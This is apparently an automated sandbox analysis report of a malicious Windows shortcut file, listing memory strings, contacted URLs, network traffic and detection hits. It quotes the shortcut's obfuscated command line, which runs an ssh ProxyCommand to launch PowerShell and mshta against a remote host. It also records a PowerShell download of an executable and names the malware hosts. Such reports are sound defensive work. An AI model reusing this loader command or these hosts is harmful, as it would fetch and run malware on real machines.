Source: powershell.exe, 00000008.00000002.2750580116.000001EED4499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3AD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED5489000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2711389243.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: powershell.exe, 00000008.00000002.2750580116.000001EED4499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED5489000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2711389243.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0K
Source: powershell.exe, 00000008.00000002.2750580116.000001EED4499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3AD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED5489000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2711389243.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: powershell.exe, 00000008.00000002.2750580116.000001EED4499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3AD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED5489000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2711389243.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000008.00000002.2750580116.000001EED4499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3AD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED5489000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2711389243.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 00000007.00000002.3582064088.0000028796E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000008.00000002.2750580116.000001EED4499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3AD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED5489000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2711389243.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000008.00000002.2750580116.000001EED4499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED5489000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2711389243.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: powershell.exe, 00000008.00000002.2750580116.000001EED4499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3AD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED5489000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2711389243.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: powershell.exe, 00000008.00000002.2750580116.000001EED4499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3AD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED5489000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2711389243.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: bdd.exe, 00000012.00000002.2711389243.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: powershell.exe, 00000008.00000002.2750580116.000001EED4499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3AD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED5489000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2711389243.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: powershell.exe, 00000008.00000002.2671803859.000001EEC5320000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://denek.local-wanderer.shop
Source: svchost.exe, 00000007.00000003.2380051472.0000028796BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drString found in binary or memory: http://ip-api.com/
Source: powershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drString found in binary or memory: http://ip-api.com/json/
Source: bdd.exe.8.drString found in binary or memory: http://ipinfo.io/
Source: powershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drString found in binary or memory: http://isr.itopupdate.com/check.php
Source: powershell.exe, 00000008.00000002.2750580116.000001EED3634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2750580116.000001EED4499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3AD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED5489000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2711389243.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000008.00000002.2750580116.000001EED4499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3AD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED5489000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2711389243.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000008.00000002.2750580116.000001EED4499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3AD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED5489000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2711389243.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000008.00000002.2750580116.000001EED4499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED5489000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2711389243.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
Source: powershell.exe, 00000008.00000002.2750580116.000001EED4499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3AD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED5489000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2711389243.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000008.00000002.2671803859.000001EEC37E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.2671803859.000001EEC5251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3A45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC5255000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pyfpdf.googlecode.com/)
Source: powershell.exe, 00000008.00000002.2671803859.000001EEC5230000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://qu.ax
Source: powershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: bdd.exe.8.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: powershell.exe, 00000004.00000002.2350655084.000001D9BF070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC35C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: bdd.exe.8.drString found in binary or memory: http://www.CCAVC.com
Source: bdd.exe.8.drString found in binary or memory: http://www.DelphiFFmpeg.com
Source: powershell.exe, 00000008.00000002.2671803859.000001EEC37E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drString found in binary or memory: http://www.borland.com/namespaces/Types
Source: powershell.exe, 00000008.00000002.2750580116.000001EED4499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3AD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC3A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED5489000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000002.2711389243.0000000006086000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
Source: bdd.exe, 00000012.00000002.2776900656.0000000006D9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
Source: 2D85F72862B55C4EADD9E66E06947F3D0.11.drString found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000004.00000002.2350655084.000001D9BF0AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2350655084.000001D9BF09B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC35C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drString found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
Source: powershell.exe, 00000008.00000002.2750580116.000001EED3634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2750580116.000001EED3634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2750580116.000001EED3634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.2671803859.000001EEC5255000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://denek.lo
Source: powershell.exe, 00000008.00000002.2671803859.000001EEC5255000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://denek.local-wander
Source: powershell.exe, 00000008.00000002.2671803859.000001EEC3A49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC5255000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://denek.local-wanderer.shop
Source: powershell.exe, 00000008.00000002.2671803859.000001EEC3A49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC5255000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://denek.local-wanderer.shop/bdd.exep
Source: powershell.exe, 00000008.00000002.2671803859.000001EEC5255000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://denek.local-wanderer.shop/bdd.exe~
Source: svchost.exe, 00000007.00000003.2380051472.0000028796C28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 00000007.00000003.2380051472.0000028796BC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000008.00000002.2671803859.000001EEC37E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.2671803859.000001EEC4609000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drString found in binary or memory: https://goto.itopupdate.com/appgoto?name=isr
Source: powershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drString found in binary or memory: https://goto.itopupdate.com/online
Source: mshta.exe, 00000005.00000002.2885515168.00000154F1D88000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2876123096.00000154F1D86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: powershell.exe, 00000008.00000002.2750580116.000001EED3634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.2671803859.000001EEC37E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2671803859.000001EEC51D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.ax
Source: powershell.exe, 00000008.00000002.2671803859.000001EEC4DD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.ax/Mc
Source: powershell.exe, 00000008.00000002.2671803859.000001EEC4DD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.ax/Mcyg
Source: powershell.exe, 00000008.00000002.2671803859.000001EEC37E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.ax/Mcyga.pdf0
Source: powershell.exe, 00000008.00000002.2671803859.000001EEC4DD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qu.ax/Mcyga.pdfp
Source: powershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drString found in binary or memory: https://s3.amazonaws.com/myfilelist/list
Source: powershell.exe, 00000004.00000002.2350655084.000001D9BF500000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2350655084.000001D9BF55B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.k
Source: mshta.exe, 00000005.00000003.2876123096.00000154F1D86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/
Source: mshta.exe, 00000005.00000003.2881397937.00000154F1D2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2887124034.0000015CF4810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4
Source: powershell.exeString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4$global:?
Source: mshta.exe, 00000005.00000002.2888379859.0000015CF8775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4...
Source: mshta.exe, 00000005.00000002.2887124034.0000015CF4833000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4...J
Source: mshta.exe, 00000005.00000002.2885782387.00000154F1F30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4.exeDrive
Source: mshta.exe, 00000005.00000003.2883113803.0000015CF8A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp488
Source: mshta.exe, 00000005.00000003.2883258400.0000015CF8D50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4=https://static.klipxuhaq.shop/BUX6P.mp413
Source: mshta.exe, 00000005.00000002.2885176784.00000154F1CF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4?
Source: mshta.exe, 00000005.00000003.2877286551.00000154F1D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2882216355.00000154F1D4E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2882216355.00000154F1D68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2877286551.00000154F1D68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2877918246.00000154F1D2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2885295855.00000154F1D4F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2885295855.00000154F1D68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2881397937.00000154F1D68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2877918246.00000154F1D68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2881397937.00000154F1D2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4C
Source: mshta.exe, 00000005.00000002.2885176784.00000154F1CF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2885704506.00000154F1DE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2876123096.00000154F1DC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2877227963.00000154F1DE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4C:
Source: mshta.exe, 00000005.00000002.2885130430.00000154F1CA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4H
Source: mshta.exe, 00000005.00000002.2888526113.0000015CF87CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4LMEMPX
Source: powershell.exe, 00000004.00000002.2348522038.000001D9BD087000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4Y
Source: powershell.exe, 00000004.00000002.2352910350.000001D9D7193000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4a
Source: mshta.exe, 00000005.00000003.2877286551.00000154F1D2C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2882216355.00000154F1D4E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2877918246.00000154F1D2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2885295855.00000154F1D4F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2885242674.00000154F1D2D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2881397937.00000154F1D2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4h
Source: mshta.exe, 00000005.00000003.2883113803.0000015CF8A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhaq.shop/BUX6P.mp4
Source: mshta.exe, 00000005.00000003.2883113803.0000015CF8A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhaq.shop/BUX6P.mp480
Source: mshta.exe, 00000005.00000003.2883113803.0000015CF8A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuhaq.shop/BUX6P.mp4https://static.klipxuh
Source: powershell.exe, 00000004.00000002.2350315023.000001D9BD380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4indows
Source: mshta.exe, 00000005.00000002.2885176784.00000154F1D16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4ional
Source: powershell.exe, 00000004.00000002.2350537645.000001D9BED00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4j
Source: ssh.exe, 00000000.00000002.2889964297.0000017B073E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, tz1WicW6sG.lnkString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi
Source: mshta.exe, 00000005.00000003.2883113803.0000015CF8A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4ojrdtj
Source: powershell.exe, 00000004.00000002.2350655084.000001D9BF051000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000005.00000003.2883113803.0000015CF8A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4p
Source: mshta.exe, 00000005.00000003.2883113803.0000015CF8A6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.klipxuhaq.shop/BUX6P.mp4pehpv
Source: powershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drString found in binary or memory: https://storage.googleapis.com/myfilelist/list
Source: powershell.exe, 00000008.00000002.2750580116.000001EED484D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2750580116.000001EED38BD000.00000004.00000800.00020000.00000000.sdmp, bdd.exe, 00000012.00000000.2659350095.0000000000471000.00000020.00000001.01000000.0000000F.sdmp, bdd.exe, 00000012.00000002.2711389243.000000000544A000.00000004.00000020.00020000.00000000.sdmp, bdd.exe.8.drString found in binary or memory: https://streams.videolan.org/upload/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.12:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.245.211.225:443 -> 192.168.2.12:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.6:443 -> 192.168.2.12:49716 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 6956, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\bdd.exeJump to dropped file
Windows shortcut file (LNK) contains suspicious command line arguments
Source: tz1WicW6sG.lnkLNK file: -o ProxyCommand="powershell powershell -Command 'kqOxxi}}=eH>Yz1>9jmshta https://static.klipxuhaq.shop/BUX6P.mp4kqOxxi}}=eH>Yz1>9j'.SubString(18, 45)" .
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: Process Memory Space: powershell.exe PID: 6956, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.evad.winLNK@29/66@8/4
Source: C:\Windows\System32\OpenSSH\ssh.exeFile created: C:\Users\user\.sshJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
Source: C:\Users\user\AppData\Roaming\bdd.exeMutant created: NULL
Source: C:\Users\user\AppData\Roaming\bdd.exeMutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$1c24
